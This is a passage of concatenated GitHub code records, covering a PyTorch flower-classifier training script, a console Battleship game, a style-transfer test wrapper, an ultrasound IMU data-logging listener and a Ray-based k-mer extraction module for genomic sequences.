nn.Dropout(drop_p)\n\n def forward(self, x):\n for linear in self.nn_hidden_layers:\n x = F.relu(linear(x))\n x = self.dropout(x)\n\n x = self.output(x)\n F.log_softmax(x, dim=1)\n return F.log_softmax(x, dim=1)\n\nif __name__ == '__main__':\n model = model_builder(args.arch)\n features = list(model.classifier.children())[:-1]\n\n if 'alexnet' in args.arch:\n input_size = features[1].in_features\n elif 'vgg' in args.arch:\n input_size = features[0].in_features\n else:\n input_size = model.classifier.in_features\n\n output_size = 102\n drop_p = args.drop_p\n learning_rate = args.learning_rate\n\n if '--hidden_layers':\n hidden_layers = list(args.hidden_units)\n else:\n hidden_layers = [4096, 2048, 512]\n\n classifier = create_classifier(input_size, output_size, hidden_layers, drop_p)\n model.classifier = classifier\n print_model(args.arch, hidden_layers, model)\n\n cw_dir = os.path.abspath(os.path.curdir)\n\n if args.data_dir == None:\n data_folder = os.path.join(cw_dir, 'flowers')\n else:\n data_folder = os.path.join(cw_dir, args.data_dir)\n\n\n train_dir = os.path.join(data_folder, 'train')\n valid_dir = os.path.join(data_folder, 'valid')\n test_dir = os.path.join(data_folder, 'test')\n\n # define transforms for the training, validation, and testing sets\n train_transforms = transforms.Compose([transforms.Resize([224, 224]),\n transforms.RandomHorizontalFlip(),\n 
transforms.RandomVerticalFlip(),\n transforms.ToTensor(),\n transforms.Normalize([0.485, 0.456, 0.406], [0.229, 0.224, 0.225])])\n test_transforms = transforms.Compose([transforms.Resize([224, 224]),\n transforms.ToTensor(),\n transforms.Normalize([0.485, 0.456, 0.406], [0.229, 0.224, 0.225])])\n\n # define datasets\n train_data = datasets.ImageFolder(train_dir, transform= train_transforms)\n test_data = datasets.ImageFolder(test_dir, transform= test_transforms)\n valid_data = datasets.ImageFolder(valid_dir, transform= test_transforms)\n\n # define the dataloaders\n trainloader = torch.utils.data.DataLoader(train_data, batch_size=32, shuffle= True)\n testloader = torch.utils.data.DataLoader(test_data, batch_size=32, shuffle= True)\n validloader = torch.utils.data.DataLoader(valid_data, batch_size=32, shuffle= True)\n\n # set device to gpu or cpu\n if args.gpu:\n device = torch.device('cuda:0' if torch.cuda.is_available() else 'cpu')\n else:\n device = 'cpu'\n\n # define criterion and optimizer\n criterion = nn.NLLLoss()\n optimizer = optim.Adam(model.classifier.parameters(), lr= learning_rate) # optimizer set for classifier\n\n train_model(model, trainloader, validloader, criterion, optimizer, device, args.epochs)\n\n if args.save_dir:\n chkpt_dir = os.path.join(cw_dir, args.save_dir)\n else:\n chkpt_dir = os.path.join(cw_dir, 'model_chkpt.pth')\n\n model.class_to_idx = train_data.class_to_idx\n model_classifier = {'epoch': args.epochs,\n 'model_arch': args.arch,\n 'learning_rate': learning_rate,\n 'input_size': input_size,\n 'output_size': output_size,\n 'hidden_layers': hidden_layers,\n 'drop_p': args.drop_p,\n 'state_dict': model.state_dict(),\n 'optimizer': optimizer.state_dict(),\n 'class_to_idx': model.class_to_idx}\n torch.save(model_classifier, chkpt_dir)\n\n print('Training complete.')\n print('Model checkpoint saved location: ', chkpt_dir)\n","repo_name":"kennybcuz/image_classifier_project","sub_path":"train.py","file_name":"train.py","file_ext":"py","file_size_in_byte":7676,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"35"} +{"seq_id":"30202016033","text":"'''\nCreated on Apr 19, 2020\n\n@author: Timothy\n'''\nfrom random import randint\nimport enum\n\n\n\n\n\n\n \n\ndef printBoard(board):\n print(\" 1 2 3 4 5 6 7 8\")\n print(\"\")\n num = 1\n for row in board:\n print(str(num) + \" \" + (\" \").join(row))\n num += 1\n print(\"\")\ndef setShips(board, ships):\n for ship in ships:\n print(\"Adding ship\")\n setShip(board, ship)\n print(\"Ship added\")\n \ndef setShip(board, shiplength):\n ##while True:\n while True:\n orientation = randint(0, 2)\n if orientation == 0:\n ##horizontal\n starting = randint(0, len(board[0]) - shiplength)\n starting2 = starting\n shiplength2 = shiplength\n row = randint(0, len(board) - 1)\n valid = True\n while shiplength2 > 0:\n if board[row][starting2] != \"0\":\n valid = False\n break\n starting2 += 1\n shiplength2 -= 1\n if not valid:\n continue\n while shiplength > 0:\n board[row][starting] = \"S\"\n starting += 1\n shiplength -= 1\n else:\n ##vertical\n starting = randint(0, len(board) - shiplength)\n starting2 = starting\n shiplength2 = shiplength\n col = randint(0, len(board[0]) - 1)\n valid2 = True\n while shiplength2 > 0:\n if board[starting2][col] != \"0\":\n valid2 = False\n break\n starting2 += 1\n shiplength2 -= 1\n if not valid2:\n continue\n while shiplength > 0:\n board[starting][col] = \"S\"\n starting += 1\n shiplength -= 1\n break\n \ndef myGuess(pcboard, myhitsboard):\n valid = 
False\n while not valid:\n while True:\n \n try:\n guessRow = int(input(\"Which row?\\n\"))\n if guessRow < 1 or guessRow > len(pcboard):\n print(\"That is an invalid row\")\n continue\n except ValueError:\n print(\"That is an invalid row\")\n continue\n \n break\n \n while True:\n try:\n guessCol = int(input(\"Which column?\\n\"))\n \n if guessCol < 1 or guessCol > len(pcboard[0]):\n print(\"That is an invalid column\")\n continue\n except ValueError:\n print(\"That is an invalid row\")\n continue\n break\n guessRow = guessRow - 1\n guessCol = guessCol - 1\n if myhitsboard[guessRow][guessCol] == \"0\":\n if pcboard[guessRow][guessCol] == \"S\":\n myhitsboard[guessRow][guessCol] = \"H\"\n print(\"You hit a ship!\")\n \n else:\n myhitsboard[guessRow][guessCol] = \"X\"\n print(\"You missed\")\n valid = True\n \n else:\n print(\"You already guessed that location. Try again.\")\n \ndef pcGuess(myboard, pchitsboard):\n print(\"The computer is choosing...\")\n valid = False\n \n while not valid:\n \n location = pcCheckHit(pchitsboard)\n \n if location == None:\n pcGuessRow = randint(0, len(myboard) - 1)\n pcGuessCol = randint(0, len(myboard[0]) - 1)\n print(\"The computer is choosing a random location\")\n \n else:\n pcGuessRow = location[0]\n pcGuessCol = location[1]\n print(\"The computer is choosing near a hit\")\n \n print(\"The computer chose row \" + str((pcGuessRow + 1)) + \" and column \" + str((pcGuessCol + 1)))\n if pchitsboard[pcGuessRow][pcGuessCol] == \"0\":\n if myboard[pcGuessRow][pcGuessCol] == \"S\":\n print(\"Your battleship got hit\")\n pchitsboard[pcGuessRow][pcGuessCol] = \"H\"\n \n else:\n print(\"Your battleship was not hit\")\n pchitsboard[pcGuessRow][pcGuessCol] = \"X\"\n valid = True\n \ndef guess(myboard, pchitsboard, row, col):\n\n if pchitsboard[row][col] == \"0\":\n if myboard[row][col] == \"S\":\n print(\"Your battleship got hit\")\n pchitsboard[row][col] = \"H\"\n \n else:\n print(\"Your battleship was not hit\")\n pchitsboard[row][col] = \"X\"\n \ndef pcCheckHit(pchitsboard):\n row = 0\n col = 0\n while row < len(pchitsboard):\n col = 0\n while col < len(pchitsboard[0]):\n if pchitsboard[row][col] == \"H\":\n x = pcAroundHit(row, col, pchitsboard)\n if x != None:\n return x\n col += 1\n row += 1\n return None\n \n\ndef pcAroundHit(row, col, pchitsboard):\n \n if row + 1 < len(pchitsboard):\n if pchitsboard[row + 1][col] == \"0\":\n return [row + 1, col]\n if row - 1 >= 0:\n if pchitsboard[row - 1][col] == \"0\":\n return [row - 1, col]\n if col + 1 < len(pchitsboard[0]):\n if pchitsboard[row][col + 1] == \"0\":\n return [row, col + 1]\n if col - 1 >= 0:\n if pchitsboard[row][col - 1] == \"0\":\n return [row, col - 1]\n else:\n return None\n \ndef testWin(pcboard, myhitsboard):\n row = 0\n col = 0\n \n while row < len(pcboard):\n col = 0\n while col < len(pcboard[0]):\n if pcboard[row][col] != \"0\":\n if myhitsboard[row][col] == \"0\":\n return False\n col += 1\n row += 1\n return True \n \nclass Strategy():\n RANDOM = 1\n \n HUNTTARGET = 2\n \n ##Checkered\n GRID1 = 3\n ##Diagonal\n GRID2 = 4\n \n\ndef checkered(myboard, pchitsboard, strategy):\n boardlength = len(pchitsboard)\n valid = False\n location = pcCheckHit(pchitsboard)\n if location == None:\n while not valid:\n col = randint(0, boardlength - 1)\n row = randint(0, boardlength - 1)\n if strategy == 3: \n if (row + col) % 2 == 0:\n if pchitsboard[row][col] == \"0\":\n valid = True\n if strategy == 4:\n if (row + col) % 2 == 1:\n if pchitsboard[row][col] == \"0\":\n valid = True\n guess(myboard, 
pchitsboard, row, col)\n else:\n while not valid:\n row = location[0]\n col = location[1]\n if pchitsboard[row][col] == \"0\":\n valid = True\n print(\"The computer is choosing near a hit\")\n guess(myboard, pchitsboard, row, col)\n \n \ndef random(myboard, pchitsboard):\n boardlength = len(pchitsboard)\n valid = False\n while not valid:\n row = randint(0, boardlength - 1)\n print(str(row))\n col = randint(0, boardlength - 1)\n print(str(col))\n if pchitsboard[row][col] == \"0\":\n valid = True\n guess(myboard, pchitsboard, row, col)\n \ndef main():\n ships = [5, 4, 3, 3, 2]\n print(\"Welcome to Battleship\")\n print(\"Choose a row and column you want to guess. Rows and columns start at 1, and there are 8 rows and 8 columns.\")\n print(\"X's indicate a miss, and H's indicate a hit.\")\n print(\"\")\n pcboard = []\n myboard = []\n myhitsboard = []\n pchitsboard = []\n for x in range(8):\n pcboard.append([\"0\"] * 8)\n myboard.append([\"0\"] * 8)\n myhitsboard.append([\"0\"] * 8)\n pchitsboard.append([\"0\"] * 8)\n \n strat = input(\"Which strategy do you want the AI to use?\\n[1: Random, 2: Hunt/Target 3: Grid]\\n\")\n if strat == \"3\":\n gridStrat = input(\"Which grid strategy do you want the AI to use?\\n[1: Checkered, 2: Checkered2]\\n\")\n strat = int(gridStrat) + 2\n strategy = int(strat)\n \n \n \n ##printBoard(pcboard)\n ##printBoard(myboard)\n \n setShips(pcboard, ships)\n setShips(myboard, ships)\n \n ##printBoard(pcboard)\n \n print(\"This is your board\")\n printBoard(myboard)\n \n \n print(\"This is your hits board\")\n printBoard(myhitsboard)\n \n while True:\n myGuess(pcboard, myhitsboard)\n if testWin(pcboard, myhitsboard):\n print(\"You won! You sunk their battleship\")\n break\n if strategy == 1:\n random(myboard, pchitsboard)\n if strategy == 2:\n pcGuess(myboard, pchitsboard)\n if strategy == 3:\n checkered(myboard, pchitsboard, 3)\n if strategy == 4:\n checkered(myboard, pchitsboard, 4)\n if testWin(myboard, pchitsboard):\n print(\"You lost. 
Your battleship was sunken\")\n break\n print(\"\")\n print(\"PC's Hits:\")\n printBoard(pchitsboard)\n print(\"\\n\")\n print(\"Your Hits:\")\n printBoard(myhitsboard)\n print(\"\\n\")\n\n\n\n\n\n\n\n\nmain()","repo_name":"TimothySung1/MiniProjects","sub_path":"Battleship/Battleship.py","file_name":"Battleship.py","file_ext":"py","file_size_in_byte":9135,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"35"} +{"seq_id":"25688432755","text":"#!/usr/bin/env python2\n# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Wed Mar 21 21:29:40 2018\n\n@author: zwx\n\"\"\"\n\nfrom argparse import ArgumentParser\nfrom model import WCT_test_all_layer\n\n\nparser = ArgumentParser()\n\n\n \nparser.add_argument('--pretrained_vgg',type=str,\n dest='pretrained_vgg',help='the pretrained vgg19 path',\n metavar='Pretrained',required = True)\nparser.add_argument('--content_path',type=str,\n dest='content_path',help='the content path',\n metavar='Content',required = True)\n\nparser.add_argument('--style_path',type=str,\n dest='style_path',help='style path',\n metavar='Style',required = True)\n \nparser.add_argument('--output_path',type=str,\n dest='output_path',help='output_path',\n metavar='Output',required = True)\n \nparser.add_argument('--alpha',type=float,\n dest='alpha',help='the blended weight',\n metavar='ALpha',required = True)\n\ndef main():\n opts = parser.parse_args()\n \n model = WCT_test_all_layer(\n pretrained_vgg = opts.pretrained_vgg,\n content_path = opts.content_path,\n style_path = opts.style_path,\n output_path = opts.output_path,\n alpha = opts.alpha,\n )\n model.test()\n \nif __name__ == '__main__' :\n main()","repo_name":"zhangcliff/WCT-based-style-transfer","sub_path":"test_all_layer.py","file_name":"test_all_layer.py","file_ext":"py","file_size_in_byte":1507,"program_lang":"python","lang":"en","doc_type":"code","stars":32,"dataset":"github-code","pt":"35"} +{"seq_id":"37396805791","text":"#!/usr/bin/env python\n\nimport argparse\nimport os.path\nimport pylisten\nfrom PIL import Image\nimport sys\nimport numpy as np\nimport pandas as pd\n\nstart = 0.0 \nflag = 0\nprevious_time = 1e-10\n## called when a new processed image is streamed\n# @param image the scan-converted image data\n# @param width width of the image in pixels\n# @param height height of the image in pixels\n# @param bpp bits per pixel\n# @param micronsPerPixel microns per pixel\n# @param timestamp the image timestamp in nanoseconds\n\ndef imu_data_processing(imu,imu_len):\n\n imu_data = np.empty(14, dtype=float)\n for i in imu:\n # print(i.ax, i.ay, i.az, i.gx, i.gy, i.gz, i.mx, i.my, i.mz, i.qw, i.qx, i.qy, i.qz)\n imu_data[0] += i.ax\n imu_data[1] += i.ay\n imu_data[2] += i.az\n imu_data[3] += i.gx\n imu_data[4] += i.gy\n imu_data[5] += i.gz\n imu_data[6] += i.mx\n imu_data[7] += i.my\n imu_data[8] += i.mz\n imu_data[9] += i.qw\n imu_data[10] += i.qx\n imu_data[11] += i.qy\n imu_data[12] += i.qz\n imu_data[13] += (i.tm/1e+9)\n\n \n imu_data = (imu_data/imu_len) \n\n # print(imu_data)\n return imu_data\n\ndef write_to_csv(imu,time_frame,previous_time):\n global flag\n path = \"/home/amalik/Documents/listener/src/python/IMU_data/imu_data.csv\"\n\n frame_data = pd.DataFrame({'acc_x': [imu[0]],'acc_y': [imu[1]],'acc_z': [imu[2]],\n 'gyro_x': [imu[3]],'gyro_y': [imu[4]],'gyro_z': [imu[5]],\n 'mag_x': [imu[6]],'mag_y': [imu[7]],'mag_z': [imu[8]],\n 'quaternion_w': [imu[9]],'quaternion_x': [imu[10]],'quaternion_y': [imu[11]],'quaternion_z': [imu[12]],\n 
'rate':[(1/(time_frame-previous_time))],'time':[time_frame]})\n \n # print(imu)\n \n if(not flag):\n frame_data.to_csv(path, mode='a', index=False, header=True)\n flag = 1 \n else:\n frame_data.to_csv(path, mode='a', index=False, header=False)\n \n\n\ndef newProcessedImage(image, width, height, bpp, micronsPerPixel, timestamp, imu):\n print(\"new image (sc): {0}, {1}x{2} @ {3} bpp, {4:.2f} um/px, imu: {5} pts\".format(timestamp, width, height, bpp, micronsPerPixel, len(imu)))\n global start\n global positional_data\n global previous_time\n \n if(start == 0.0):\n start = np.round_((timestamp/1e+9), decimals = 3)\n\n # img = Image.frombytes('L', (width, height), image)\n if bpp == 32:\n img = Image.frombytes('RGBA', (width, height), image)\n else:\n img = Image.frombytes('L', (width, height), image)\n\n time_frame = abs(np.round_((timestamp/1e+9 - start), decimals = 3))\n \n # /********************************************\n # for raw imu data:\n imu_data = imu_data_processing(imu, len(imu))\n \n write_to_csv(imu_data,time_frame,previous_time)\n \n # ********************************************/\n previous_time = time_frame\n # /********************************************\n # for positional data:\n # position_data = positional_data_processing(imu_data)\n # write_to_csv(position_data,time_frame)\n # ********************************************/\n \n path_img = \"/home/amalik/Documents/listener/src/python/slice_data/\" + f\"{time_frame}.png\"\n img.save(path_img)\n\n return\n\n\n## called when a new raw image is streamed\n# @param image the raw pre scan-converted image data, uncompressed 8-bit or jpeg compressed\n# @param lines number of lines in the data\n# @param samples number of samples in the data\n# @param bps bits per sample\n# @param axial microns per sample\n# @param lateral microns per line\n# @param timestamp the image timestamp in nanoseconds\n# @param jpg jpeg compression size if the data is in jpeg format\ndef newRawImage(image, lines, samples, bps, axial, lateral, timestamp, jpg):\n print(\"new image (ps): {0}, {1}x{2} @ {3} bps, {4:.2f} um/s, {5:.2f} um/l\".format(timestamp, lines, samples, bps, axial, lateral))\n if jpg == 0:\n img = Image.frombytes('L', (samples, lines), image, \"raw\")\n else:\n # note! 
this probably won't work unless a proper decoder is written\n img = Image.frombytes('L', (samples, lines), image, \"jpg\")\n img.save(\"raw_image.jpg\")\n return\n\n## called when freeze state changes\n# @param frozen the freeze state\ndef freezeFn(frozen):\n if frozen:\n print(\"imaging frozen\")\n else:\n print(\"imaging running\")\n return\n\n## called when a button is pressed\n# @param button the button that was pressed\n# @param clicks number of clicks performed\ndef buttonsFn(button, clicks):\n print(\"button pressed: {0}, clicks: {1}\".format(button, clicks))\n return\n\n## main function\ndef main():\n parser = argparse.ArgumentParser()\n parser.add_argument('--address', '-a', dest='ip', help='ip address of probe.', required=True)\n parser.add_argument('--port', '-p', dest='port', type=int, help='port of the probe', required=True)\n parser.add_argument('--width', '-w', dest='width', type=int, help='image output width in pixels')\n parser.add_argument('--height', '-ht', dest='height', type=int, help='image output height in pixels')\n parser.set_defaults(ip=None)\n parser.set_defaults(port=None)\n parser.set_defaults(width=640)\n parser.set_defaults(height=480)\n args = parser.parse_args()\n\n # uncomment to get documentation for pylisten module\n # print(help(pylisten))\n if not args.ip or not args.port or args.port < 0:\n print(\"one or more arguments are invalid\")\n parser.print_usage()\n return\n \n # get home path\n path = os.path.expanduser(\"~/\")\n\n # initialize\n listen = pylisten.Listener(newProcessedImage, newRawImage, freezeFn, buttonsFn)\n ret = listen.init(path, args.width, args.height)\n if ret:\n print(\"initialization succeeded\")\n ret = listen.connect(args.ip, args.port)\n if ret:\n print(\"connected to {0} on port {1}\".format(args.ip, args.port))\n else:\n print(\"connection failed\")\n listen.destroy()\n return\n else:\n print(\"initialization failed\")\n return\n \n # input loop\n key = ''\n while key != 'q' and key != 'Q':\n key = input(\"press ('q' to quit) ('a' for action): \")\n if key == 'a' or key == 'A':\n key = input(\"(f)->freeze, (i)->image, (c)->cine, (d/D)->depth, (g/G)->gain: \")\n if key == 'f' or key == 'F':\n listen.userFunction(1)\n elif key == 'i' or key == 'I':\n listen.userFunction(2)\n elif key == 'c' or key == 'C':\n listen.userFunction(3)\n elif key == 'd':\n listen.userFunction(4)\n elif key == 'D':\n listen.userFunction(5)\n elif key == 'g':\n listen.userFunction(6)\n elif key == 'G':\n listen.userFunction(7)\n\n listen.destroy()\n\nif __name__ == '__main__':\n main()\n","repo_name":"amalik3099/MQP-Ultrasound-Needle-Guidance","sub_path":"src/python/data_aquisition_pipeline.py","file_name":"data_aquisition_pipeline.py","file_ext":"py","file_size_in_byte":6996,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"35"} +{"seq_id":"34003631754","text":"import os\nimport ray\nimport gzip\nimport warnings\n\nimport numpy as np\nimport pandas as pd\n\nfrom Bio import SeqIO\nfrom glob import glob\nfrom shutil import rmtree\nfrom os.path import splitext\n\n# Kmers extraction\nfrom data.extraction.seen_kmers_vectorizer import SeenKmersVectorizer\nfrom data.extraction.given_kmers_vectorizer import GivenKmersVectorizer\n\n# Features selection\nfrom data.reduction.chi2_selection import TensorChi2Selection\nfrom data.reduction.occurence_exclusion import TensorPercentOccurenceExclusion\n\n__author__ = ['Amine Remita', 'Nicolas de Montigny']\n\n__all__ = ['KmersCollection']\n\n\"\"\"\nModule inspired from module 
kmer_collections.py of\nmlr_kgenomvir package [Remita et al. 2022]\n\nLoad sequences to pandas dataframe by batch then saved to parquet files.\nRead parquet files into a unified ray dataset, before tokenizing kmers from sequence into count matrix and concatenating into a tensor.\nUsing Ray datasets for I/O and to scale cluster to available computing ressources.\n\"\"\"\n\nos.environ['TF_CPP_MIN_LOG_LEVEL'] = '3'\nwarnings.filterwarnings(\"ignore\")\n\nclass KmersCollection():\n \"\"\"\n ----------\n Attributes\n ----------\n\n k : int\n The length of K-mers extracted\n\n dataset : string\n Name of the dataset from which the K-mers profiles were extracted\n\n Xy_file : string\n Path to a folder containing the Ray Dataset of K-mers abundance profiles\n The folder contains a number of files in Apache parquet format\n The number of files is equivalent to the number of blocks in the dataset\n\n fasta : string\n A fasta file containing all sequences from which K-mers were extracted\n\n csv : string\n A csv file containing all classes in the database associated to each ID\n\n df : ray.data.Dataset\n A Ray dataset containing the K-mers abundance profiles of each sequences\n\n ids : list\n A list of all sequences ids\n\n taxas : list of strings\n A list containing the taxas contained in the dataset if they were present\n Returns None if no taxas were present in the dataset\n\n classes : list of strings\n A list containing the classes contained in the dataset if they were present\n It must be paired to the attribute 'taxas' to be used\n Returns None if no classes were present in the dataset\n\n method : string\n Method used to extract K-mers :\n 'given' if a K-mers list was passed in parameters\n 'seen' if no K-mers list was passed in parameters\n\n kmers_list : list of strings\n List of given K-mers if one was passed in parameters\n List of K-mers extracted if none was passed in parameters\n \"\"\"\n def __init__(\n self,\n fasta_file,\n Xy_file,\n k,\n cls_file = None,\n kmers_list = None,\n ):\n ## Public attributes\n # Parameters\n self.k = k\n self.Xy_file = Xy_file\n self.fasta = fasta_file\n self.csv = cls_file\n # Initialize variables\n self.df = None\n self.ids = []\n self.taxas = []\n self.method = None\n self.kmers_list = None\n self._nb_kmers = 0\n self._labels = None\n self._files_list = []\n self.memory_parsing = False\n \n # Infer method from presence of already extracted kmers or not\n if isinstance(kmers_list, list):\n self.method = 'given'\n self.kmers_list = kmers_list\n self._nb_kmers = len(self.kmers_list)\n else:\n self.method = 'seen'\n \n # Global tmp dir path\n self._tmp_dir = os.path.join(os.path.split(Xy_file)[0],\"tmp\",\"\")\n # Make global tmp dir if it doesn't exist\n if not os.path.isdir(self._tmp_dir):\n os.mkdir(self._tmp_dir)\n\n # Read classes files if present\n if self.csv is not None:\n self._read_cls_file()\n\n def _read_cls_file(self):\n self._labels = pd.read_csv(self.csv)\n # Get taxas from csv file\n if len(self._labels.columns) > 0:\n self.taxas = list(self._labels.columns)\n self.taxas.remove('id')\n else:\n raise ValueError(f'No information found in the classes csv file : {self.csv}')\n\n # Execute k-mers extraction\n def compute_kmers(self):\n print('compute_kmers')\n self._verif_mem_vs_disk()\n self._parse_fasta()\n self._make_ray_ds()\n self._kmers_tokenization()\n self._write_dataset()\n\n def _verif_mem_vs_disk(self):\n mem = ray.cluster_resources()['memory']\n fasta_size = os.path.getsize(os.path.expanduser(self.fasta))\n if mem > fasta_size:\n 
self.memory_parsing = True\n\n def _parse_fasta(self):\n print('_parse_fasta')\n if os.path.isfile(self.fasta):\n if self.memory_parsing:\n self._single_fasta_ds_mem()\n else:\n self._single_fasta_ds_disk()\n elif os.path.isdir(self.fasta):\n if self.memory_parsing:\n self._multi_fasta_ds_mem()\n else:\n self.fasta = glob(os.path.join(self.fasta, '*.fa'))\n self._multi_fasta_ds_disk()\n else:\n raise ValueError('Fasta must be an interleaved fasta file or a directory containing fasta files.')\n \n def _single_fasta_ds_mem(self):\n print('_single_fasta_ds_mem')\n data = {\n 'id':[],\n 'sequence':[]\n }\n path, ext = splitext(self.fasta)\n ext = ext.lstrip(\".\")\n if ext in [\"fa\",\"fna\",\"fasta\"]:\n with open(self.fasta, 'rt') as handle:\n for i, record in enumerate(SeqIO.parse(handle, 'fasta')):\n data['id'].append(record.id)\n data['sequence'].append(str(record.seq).upper())\n elif ext == \"gz\":\n with gzip.open(self.fasta, 'rt') as handle:\n for i, record in enumerate(SeqIO.parse(handle, 'fasta')):\n data['id'].append(record.id)\n data['sequence'].append(str(record.seq).upper())\n else:\n raise ValueError(f'Unknown file extension : {ext}')\n \n self.ids = data['id']\n self.df = pd.DataFrame(data)\n if self._labels is not None:\n self.df = pd.merge(self.df, self._labels, on = 'id', how = 'left')\n\n def _single_fasta_ds_disk(self):\n print('_single_fasta_ds_disk')\n data = {\n 'id':[],\n 'sequence':[]\n }\n path, ext = splitext(self.fasta)\n ext = ext.lstrip(\".\")\n if ext in [\"fa\",\"fna\",\"fasta\"]:\n with open(self.fasta, 'rt') as handle:\n for i, record in enumerate(SeqIO.parse(handle, 'fasta')):\n data['id'].append(record.id)\n data['sequence'].append(str(record.seq).upper())\n if i % 100 == 0 :\n df = pd.DataFrame(data)\n if self._labels is not None:\n cls = self._labels[self._labels['id'].isin(data['id'])]\n df = pd.merge(df, cls, on = 'id', how = 'left')\n df.to_parquet(os.path.join(self._tmp_dir, f'batch_{int(i/100)}.parquet'))\n self.ids.extend(data['id'])\n data = {\n 'id':[],\n 'sequence':[]\n }\n if len(data['id']) != 0:\n df = pd.DataFrame(data)\n if self._labels is not None:\n cls = self._labels[self._labels['id'].isin(data['id'])]\n df = pd.merge(df, cls, on = 'id', how = 'left')\n df.to_parquet(os.path.join(self._tmp_dir, f'batch_end.parquet'))\n self.ids.extend(data['id'])\n elif ext == \"gz\":\n with gzip.open(self.fasta, 'rt') as handle:\n for i, record in enumerate(SeqIO.parse(handle, 'fasta')):\n data['id'].append(record.id)\n data['sequence'].append(str(record.seq).upper())\n if i % 100 == 0 :\n df = pd.DataFrame(data)\n if self._labels is not None:\n cls = self._labels[self._labels['id'].isin(data['id'])]\n df = pd.merge(df, cls, on = 'id', how = 'left')\n df.to_parquet(os.path.join(self._tmp_dir, f'batch_{int(i/100)}.parquet'))\n self.ids.extend(data['id'])\n data = {\n 'id':[],\n 'sequence':[]\n }\n if len(data['id']) != 0:\n df = pd.DataFrame(data)\n if self._labels is not None:\n cls = self._labels[self._labels['id'].isin(data['id'])]\n df = pd.merge(df, cls, on = 'id', how = 'left')\n df.to_parquet(os.path.join(self._tmp_dir, f'batch_end.parquet'))\n self.ids.extend(data['id'])\n else:\n raise ValueError(f'Unknown file extension : {ext}')\n\n def _multi_fasta_ds_mem(self):\n print('_multi_fasta_ds_mem')\n data = {\n 'id':[],\n 'sequence':[]\n }\n for i, file in enumerate(self.fasta):\n path, ext = splitext(file)\n ext = ext.lstrip(\".\")\n if ext in [\"fa\",\"fna\",\"fasta\"]:\n with open(file, 'rt') as handle:\n for record in SeqIO.parse(handle, 
'fasta'):\n data['id'].append(record.id)\n data['sequence'].append(str(record.seq).upper())\n elif ext == \"gz\":\n with gzip.open(file, 'rt') as handle:\n for record in SeqIO.parse(handle, 'fasta'):\n data['id'].append(record.id)\n data['sequence'].append(str(record.seq).upper())\n else:\n raise ValueError(f'Unknown file extension : {ext}')\n \n self.ids = data['id']\n self.df = pd.DataFrame(data)\n if self._labels is not None:\n self.df = pd.merge(self.df, self._labels, on = 'id', how = 'left')\n \n def _multi_fasta_ds_disk(self):\n print('_multi_fasta_ds_disk')\n data = {\n 'id':[],\n 'sequence':[]\n }\n for i, file in enumerate(self.fasta):\n path, ext = splitext(file)\n ext = ext.lstrip(\".\")\n if ext in [\"fa\",\"fna\",\"fasta\"]:\n with open(file, 'rt') as handle:\n for record in SeqIO.parse(handle, 'fasta'):\n data['id'].append(record.id)\n data['sequence'].append(str(record.seq).upper())\n elif ext == \"gz\":\n with gzip.open(file, 'rt') as handle:\n for record in SeqIO.parse(handle, 'fasta'):\n data['id'].append(record.id)\n data['sequence'].append(str(record.seq).upper())\n else:\n raise ValueError(f'Unknown file extension : {ext}')\n if i % 100 == 0 :\n df = pd.DataFrame(data)\n if self._labels is not None:\n cls = self._labels[self._labels['id'].isin(data['id'])]\n df = pd.merge(df, cls, on = 'id', how = 'left')\n df.to_parquet(os.path.join(self._tmp_dir, f'batch_{int(i/100)}.parquet'))\n self.ids.extend(data['id'])\n data = {\n 'id':[],\n 'sequence':[]\n }\n if len(data['id']) != 0:\n df = pd.DataFrame(data)\n if self._labels is not None:\n cls = self._labels[self._labels['id'].isin(data['id'])]\n df = pd.merge(df, cls, on = 'id', how = 'left')\n df.to_parquet(os.path.join(self._tmp_dir, f'batch_end.parquet'))\n self.ids.extend(data['id'])\n\n def _make_ray_ds(self):\n print('_make_ray_ds')\n if self.memory_parsing:\n self.df = ray.data.from_pandas(self.df)\n if self.df.count() > 10:\n self.df = self.df.repartition(int(self.df.count()/10))\n else:\n self._files_list = glob(os.path.join(self._tmp_dir, '*.parquet'))\n self.df = ray.data.read_parquet_bulk(self._files_list, parallelism = len(self._files_list))\n\n def _kmers_tokenization(self):\n print('_kmers_tokenization')\n if self.method == 'seen':\n tokenizer = SeenKmersVectorizer(\n k = self.k,\n column = 'sequence'\n )\n elif self.method == 'given':\n tokenizer = GivenKmersVectorizer(\n k = self.k,\n column = 'sequence',\n tokens = self.kmers_list\n )\n tokenizer.fit(self.df)\n self.df = tokenizer.transform(self.df)\n if self.method == 'seen':\n self.kmers_list = tokenizer.stats_['tokens(sequence)']\n self._kmers_reduction()\n\n def _kmers_reduction(self):\n # Exclusion of columns occuring in less 5% / more 95% of the samples\n excluder = TensorPercentOccurenceExclusion(\n features = self.kmers_list,\n percent = 0.05\n )\n self.df = excluder.fit_transform(self.df)\n \n self.kmers_list = excluder.stats_['cols_keep']\n\n # Chi2 evaluation of dependance between features and classes\n selector = TensorChi2Selection(\n features = self.kmers_list,\n threshold = 0.05\n )\n self.df = selector.fit_transform(self.df)\n \n self.kmers_list = selector.stats_['cols_keep']\n\n def _write_dataset(self):\n self.df.write_parquet(self.Xy_file)\n rmtree(self._tmp_dir)\n","repo_name":"bioinfoUQAM/Caribou","sub_path":"src/data/kmers.py","file_name":"kmers.py","file_ext":"py","file_size_in_byte":13984,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"35"} +{"seq_id":"18394094250","text":"from 
